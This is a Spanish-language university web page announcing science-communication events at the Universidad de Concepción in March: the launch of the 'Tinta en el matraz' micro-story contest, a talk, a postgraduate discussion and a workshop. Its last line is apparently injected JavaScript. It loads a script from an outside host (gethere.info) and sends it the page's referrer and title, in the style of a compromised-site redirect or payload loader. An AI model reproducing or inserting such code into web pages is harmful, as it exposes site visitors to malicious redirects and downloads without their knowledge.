Afiche Lanzamiento concurso microcuentos "Tinta en el matraz"

Afiche Lanzamiento concurso microcuentos «Tinta en el matraz»

Los días 23 y 24 de Marzo se realizará una serie de actividades relacionadas con la comunicación de las ciencias en la Facultad de Ciencias Biológicas de la Universidad de Concepción. Lo anterior, junto a la productora Divulgociencia, y la invitada Dra. Carolina Torrealba, Directora de nuevos proyectos de la Fundación Ciencia & Vida y autora del libro: “Pioneros: El inicio de la Biología Experimental en Chile.”

El día miércoles 23 de marzo, a las 12 horas, en el Auditorio Lipschutz de la Facultad de Ciencias Biológicas se realizará el Lanzamiento del Concurso de Microcuentos científicos “Tinta en el matraz”. Esta actividad está abierta a toda la comunidad universitaria y contará con la exposición de la Dra. Torrealba: “La historia de una mano, una mariposa y una cucaracha (o una biografía de la ciencia chilena)”.

Luego, ese mismo día miércoles 23 a las 15:30 horas, en la sala de Postgrado 2, (ubicada en el 2do piso del Edificio del Arco de la Facultad de Ciencias Biológicas, por el lado de Decanato) tendrá lugar un Conversatorio sobre divulgación de las ciencias. Estará moderado por Sergio Villagrán, de Productora Divulgociencia y la Dra. Carolina Torrealba y está destinado, esta vez, a estudiantes de postgrado quienes son protagonistas del quehacer científico.

Programa de actividades 1er Workshop "Detrás de las letras: Experiencias de divulgación científica."

Programa de actividades 1er Workshop «Detrás de las letras: Experiencias de divulgación científica.»

El día jueves 24 de marzo, desde las 9:30 horas, en el Auditorio del Edificio de Aulas, de la Facultad de Ciencias Biológicas se realizará el 1er Workshop sobre comunicación de las ciencias: “Detrás de las letras: experiencias de comunicación científica”. Esta actividad está abierta a toda la comunidad universitaria y el registro se realizará en el mismo lugar. Contará con la participación de los siguientes expositores: Dr. Ronald Mennickent, del Departamento de Astronomía de la UdeC, Dra. Carolina Torrealba, Fundación Ciencia & Vida y Msc. Bárbara Morales, Periodista de la Facultad de Ciencias Biológicas, UdeC.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;